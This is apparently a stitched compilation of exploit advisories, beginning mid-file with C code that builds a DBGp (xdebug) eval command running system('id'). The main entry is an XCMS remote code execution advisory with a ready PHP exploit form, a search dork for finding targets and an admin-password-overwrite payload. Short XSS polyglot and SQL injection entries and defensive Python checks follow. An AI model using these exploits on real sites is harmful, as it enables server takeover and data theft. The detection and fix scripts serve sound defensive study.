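/* IDE side: parse one frame out of a receive buffer. Returns a pointer to
 * the NUL-terminated XML and stores its length, or NULL if malformed. */
const char *dbgp_parse_frame(const char *buf, size_t buflen, size_t *xml_len) {
    size_t i = 0, len = 0;
    while (i < buflen && buf[i] >= '0' && buf[i] <= '9') {
        if (len > (SIZE_MAX - 9) / 10) return NULL;            /* length overflow */
        len = len * 10 + (size_t)(buf[i] - '0');
        i++;
    }
    if (i == 0 || i >= buflen || buf[i] != '\0') return NULL;   /* no length, or no NUL after it */
    i++;
    if (len >= buflen - i || buf[i + len] != '\0') return NULL; /* XML plus trailing NUL must fit */
    *xml_len = len;
    return buf + i;
}

static const char B64[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

/* Standard base64 with '=' padding; caller frees the result. */
char *b64_encode(const unsigned char *in, size_t n) {
    char *out = malloc(4 * ((n + 2) / 3) + 1);
    size_t i = 0, j = 0;
    if (!out) return NULL;
    for (; i + 2 < n; i += 3) {
        unsigned v = (in[i] << 16) | (in[i + 1] << 8) | in[i + 2];
        out[j++] = B64[v >> 18]; out[j++] = B64[(v >> 12) & 63];
        out[j++] = B64[(v >> 6) & 63]; out[j++] = B64[v & 63];
    }
    if (n - i == 1) {
        unsigned v = in[i] << 16;
        out[j++] = B64[v >> 18]; out[j++] = B64[(v >> 12) & 63];
        out[j++] = '='; out[j++] = '=';
    } else if (n - i == 2) {
        unsigned v = (in[i] << 16) | (in[i + 1] << 8);
        out[j++] = B64[v >> 18]; out[j++] = B64[(v >> 12) & 63];
        out[j++] = B64[(v >> 6) & 63]; out[j++] = '=';
    }
    out[j] = '\0';
    return out;
}

/* IDE -> engine: "eval -i <txid> -- <base64(php)>" followed by a NUL, which
 * is part of the wire format; wire_len counts it. Caller frees the result. */
char *dbgp_eval_command(int txid, const char *php, size_t *wire_len) {
    char *b64 = b64_encode((const unsigned char *)php, strlen(php));
    if (!b64) return NULL;
    size_t need = strlen(b64) + 32;
    char *cmd = malloc(need);
    int n = cmd ? snprintf(cmd, need, "eval -i %d -- %s", txid, b64) : -1;
    free(b64);
    if (n < 0 || (size_t)n >= need) { free(cmd); return NULL; }
    *wire_len = (size_t)n + 1;
    return cmd;
}

/* Constructed init packet modelled on what xdebug sends; not a capture. */
static const char INIT_XML[] =
    "<?xml version=\"1.0\" encoding=\"iso-8859-1\"?>"
    "<init xmlns=\"urn:debugger_protocol_v1\" fileuri=\"file:///var/www/html/index.php\" "
    "language=\"PHP\" protocol_version=\"1.0\" appid=\"4242\" idekey=\"msf\"></init>";

int main(void) {
    char wire[512];
    size_t wire_len = dbgp_build_frame(INIT_XML, wire, sizeof wire);
    size_t xml_len = 0;
    const char *xml = dbgp_parse_frame(wire, wire_len, &xml_len);
    if (!xml) { fprintf(stderr, "bad frame\n"); return 1; }
    printf("engine -> ide: %zu-byte frame carrying %zu bytes of XML:\n%s\n", wire_len, xml_len, xml);

    size_t cmd_len = 0;
    char *cmd = dbgp_eval_command(1, "system('id');", &cmd_len);  /* constructed PHP */
    if (!cmd) return 1;
    printf("ide -> engine: %s (plus NUL, %zu bytes on the wire)\n", cmd, cmd_len);
    free(cmd);
    return 0;
}
```

The parser refuses frames whose declared length does not fit the buffer, which matters on the listener side because the module reads a fixed 1024 bytes and a real init packet may arrive split; on the engine side there is no authentication at all, so anything that can reach the debug port and answer with a well-formed command gets eval.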
            
Exploit Title:  XCMS v1.83 - Remote Command Execution (RCE)
Author: Onurcan
Email: onurcanalcan@gmail.com
Site: ihteam.net
Script Download :  http://www.xcms.it
Date:  26/12/2022

The XCMS footer (stored in "/dati/generali/footer.dtb") is included in every page of the CMS.
Taking "home.php" as an example:
 
       <?php
         //home.php
         [...]
         include(CSTR."footer".STR); // <- "CSTR" and "STR" are constants declared earlier; they refer to "/dati/generali" and "dtb"
       ?>

XCMS lets the administrator edit the footer through a page called cpie.php in the admin panel, and that page is where the bug is.
Let's take a look at the flawed code:

       <?php
         //cpie.php
         [...]
         if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); } // <- the redirect header is sent, but without an exit() the script keeps running
         [...]
         if(isset($_POST['salva'])){
            Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- the change is saved without any further check
         } 
         [...]
       ?>
       
So with a simple HTML form we can change the footer.
Ex:

        <form name="editor" action="http://[SITE_WITH_XCMS]/index.php?lng=it&pg=admin&s=cpie" method="post">
        <input type="hidden" name="salva" value="OK" />
        <textarea name="testo_0"><?php YOUR PHP CODE ?></textarea>
        <input type="submit" value="Modifica" />
        </form>
        <script>document.editor.submit()</script>
        
        Note: This is NOT a CSRF; the form is just a convenient way to send the POST. Because the redirect is never followed by exit(), the request reaches Scrivi() without admin credentials.
 
 
       
Trick: We can change the admin panel password by inserting this code in the footer:
      
       <?php
       $pwd = "owned"; // <- Place your new password here.
       $pwd2 = md5($pwd);
       unlink("dati/generali/pass.php");
       $f = fopen("dati/generali/pass.php","w"); // the mode must be the string "w"; a bare w is an undefined constant
       fwrite($f,"<?php \$mdp = \"$pwd2\"; ?>");
       fclose($f);
       ?>
       
This code deletes the old password file and creates a new one holding the MD5 hash of your new password.


Fix:
  
        <?php
         //cpie.php
         [...]
         if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); exit(); } // exit() after the redirect fixes the bug: unauthenticated requests stop here
         [...]
         if(isset($_POST['salva'])){
            Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0'])); // <- still written without validation, but now only a logged-in admin reaches this line
         } 
         [...]
       ?>
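The fix comes down to one rule: a header("Location: ...") redirect used as an access check must be followed by exit(). The Python script below is an added example, not part of the original advisory or of XCMS, that scans PHP source for Location redirects with no terminator on the rest of the same line or on the next statement line. It is run here against constructed excerpts modelled on the vulnerable and fixed cpie.php snippets above, not on the real XCMS source.

```python
import re

# Constructed excerpts modelled on the cpie.php snippets quoted in the advisory
# (not the real XCMS source): one redirect without exit(), one with it.
VULNERABLE_CPIE = '''<?php
//cpie.php
if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); }
if(isset($_POST['salva'])){
   Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0']));
}
?>'''

FIXED_CPIE = '''<?php
//cpie.php
if(isset($_SESSION['logadmin'])===false){ header("location:index.php"); exit(); }
if(isset($_POST['salva'])){
   Scrivi(CGEN."footer".DTB,stripslashes($_POST['testo_0']));
}
?>'''

# header( "Location: ..." ) in any casing or spacing
REDIRECT_RE = re.compile(r'''header\s*\(\s*["']\s*location\s*:''', re.IGNORECASE)
# exit, exit(), die, die(...) or return: anything that stops execution after the header
TERMINATOR_RE = re.compile(r'\b(?:exit|die)\b\s*(?:\(|;)|\breturn\b')


def find_unterminated_redirects(php_source):
    """Return [(line_no, line)] for each Location redirect that is not followed by a
    terminator on the rest of its own line or on the next non-blank line."""
    lines = php_source.splitlines()
    findings = []
    for idx, line in enumerate(lines):
        match = REDIRECT_RE.search(line)
        if not match:
            continue
        rest_of_line = line[match.end():]
        next_stmt = next((l for l in lines[idx + 1:] if l.strip()), "")
        if TERMINATOR_RE.search(rest_of_line) or TERMINATOR_RE.search(next_stmt):
            continue
        findings.append((idx + 1, line.strip()))
    return findings


if __name__ == "__main__":
    for name, src in (("vulnerable", VULNERABLE_CPIE), ("fixed", FIXED_CPIE)):
        hits = find_unterminated_redirects(src)
        print(f"{name}: {len(hits)} unterminated redirect(s)")
        for line_no, text in hits:
            print(f"  line {line_no}: {text}")
```

The check is line-based: it misses a terminator placed further down or in a different branch, and it treats a return inside a function the same as one at file scope. Treat its hits as candidates to review by hand, not as confirmed bugs.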

So this is a simple exploit:


<?php
// Step 2: build the auto-submitting form that posts the supplied PHP code as the new footer.
if(isset($_POST['send']) and isset($_POST['code']) and isset($_POST['site'])){
echo "
<form name=\"editor\" action=\"http://".$_POST['site']."/index.php?lng=it&pg=admin&s=cpie\" method=\"post\">
<input type=\"hidden\" name=\"salva\" value=\"OK\" />
<textarea name=\"testo_0\">".$_POST['code']."</textarea>
<input type=\"submit\" value=\"Modifica\" />
</form>
<script>document.editor.submit()</script>";
}else{
// Step 1: ask for the target host and the PHP code to inject; the form posts back to this script.
echo"
<pre>
XCMS <= v1.82 Remote Command Execution Vulnerability
Dork  :  inurl:\"mod=notizie\"
by Onurcan
Visit ihteam.net
</pre>
<form method=POST action=\"".$_SERVER['PHP_SELF']."\">
<pre>
Site     :
<input type=text name=site />
Code     :
<textarea name=code cols=49 rows=14>Your code here</textarea>
<input type=submit value=Exploit />
<input type=hidden name=\"send\" />
</pre>
</form>";
}
?>
            
source: https://www.securityfocus.com/bid/51699/info

xClick Cart is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

xClick Cart versions 1.0.1 and 1.0.2 are affected; other versions may also be vulnerable. 

http://www.example.com/pages/cart/webscr.php?cmd=_cart&ew=1&item_name=Scrimshaw+Kit&item_number=SK1&amount=25.00&quantity=1&shipping=&tax=0&shopping_url=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E 
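The payload in the URL above is a context polyglot: it tries to close a single- or double-quoted JavaScript string (with and without a preceding backslash), an HTML comment and an open SCRIPT block, then opens a new one. The Python script below is an added example, not part of the advisory or of xClick Cart. The webscr.php templates it renders are assumptions, since the advisory does not show the page's markup; it decodes the page's own payload and shows the output encoding that neutralises it in the two contexts the payload targets, an HTML attribute and a JavaScript string literal.

```python
import html
import json
from urllib.parse import unquote

# The shopping_url value from the PoC URL above, exactly as it appears there (URL-encoded).
ENCODED_PAYLOAD = (
    "%27;alert%28String.fromCharCode%2888,83,83%29%29//\\%27;alert%28String.fromCharCode%2888,83,83%29%29"
    "//%22;alert%28String.fromCharCode%2888,83,83%29%29//\\%22;alert%28String.fromCharCode%2888,83,83%29%29"
    "//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E"
)
PAYLOAD = unquote(ENCODED_PAYLOAD)


def render_vulnerable(shopping_url):
    """Hypothetical template that drops the parameter into an href attribute unencoded.
    The real webscr.php markup is not shown in the advisory; this reproduces the bug class only."""
    return '<a href="%s">Continue shopping</a>' % shopping_url


def render_attribute(shopping_url):
    """HTML attribute context: encode & < > " ' so the value can neither close the
    attribute nor start a tag."""
    return '<a href="%s">Continue shopping</a>' % html.escape(shopping_url, quote=True)


def js_string_literal(value):
    """JavaScript string context: JSON-encode, then also escape '<'. json.dumps leaves
    '<' and '/' untouched, so a value containing </script> would otherwise end the
    enclosing <script> block before the JS engine ever sees the string."""
    return json.dumps(value).replace("<", "\\u003c")


def render_script(shopping_url):
    """Hypothetical script block that hands the URL to client-side code."""
    return "<script>var shoppingUrl = %s;</script>" % js_string_literal(shopping_url)


def count_script_tags(rendered):
    """How many <script start tags an HTML parser would see (case-insensitive)."""
    return rendered.lower().count("<script")


if __name__ == "__main__":
    print("decoded payload:", PAYLOAD)
    for name, out in (("vulnerable", render_vulnerable(PAYLOAD)),
                      ("attribute-encoded", render_attribute(PAYLOAD)),
                      ("script-encoded", render_script(PAYLOAD))):
        print(f"{name}: {count_script_tags(out)} <script tag(s)")
```

The two encoders are not interchangeable: html.escape() output inside a script block is not entity-decoded by the browser, and a JSON literal inside an attribute is not attribute-safe, so the encoder has to match the exact context the value lands in.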
            
source: https://www.securityfocus.com/bid/68438/info

xClassified is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

xClassified 1.2 is vulnerable; other versions may also be affected. 

http://www.example.com/ads.php?catid=4%27a[SQLi]
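The probe in the URL above (catid=4%27a) is a stray single quote that breaks the query, which is how the tester confirmed the parameter reaches the SQL parser. The Python script below is an added example, not code from the advisory or from xClassified; it reproduces the pattern against a constructed in-memory SQLite table. It assumes ads.php quotes catid inside the WHERE clause (which is what the quote probe implies) and shows the parameterised version beside it. The boolean payload used to dump every row is an assumption standing in for the advisory's [SQLi] placeholder.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the ads table; the real xClassified schema is not known."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE ads (id INTEGER PRIMARY KEY, catid INTEGER, title TEXT)")
    conn.executemany("INSERT INTO ads (catid, title) VALUES (?, ?)",
                     [(4, "bike"), (7, "sofa"), (9, "laptop")])
    return conn


def ads_by_catid_vulnerable(conn, catid):
    """String concatenation: the assumed pattern behind ads.php?catid=...
    The user value becomes part of the SQL text, so quotes in it change the query."""
    sql = "SELECT id, title FROM ads WHERE catid = '" + catid + "'"
    return conn.execute(sql).fetchall()


def ads_by_catid_safe(conn, catid):
    """Parameterised query: the value is bound by the driver and never parsed as SQL."""
    return conn.execute("SELECT id, title FROM ads WHERE catid = ?", (catid,)).fetchall()


def probe_breaks_query(conn, probe="4'a"):
    """The advisory's probe (catid=4%27a). With concatenation the unbalanced quote is a
    syntax error, the classic first sign that the input is interpreted as SQL."""
    try:
        ads_by_catid_vulnerable(conn, probe)
        return False
    except sqlite3.OperationalError:
        return True


if __name__ == "__main__":
    db = make_db()
    tautology = "4' OR '1'='1"  # assumed payload for the [SQLi] placeholder
    print("probe breaks vulnerable query:", probe_breaks_query(db))
    print("vulnerable, tautology payload:", ads_by_catid_vulnerable(db, tautology))
    print("safe, same payload:          ", ads_by_catid_safe(db, tautology))
    print("safe, legitimate value:      ", ads_by_catid_safe(db, "4"))
```

With the bound parameter the same tautology string is compared as a literal against an integer column and matches nothing, while the legitimate value still works; the fix is the query shape, not input filtering.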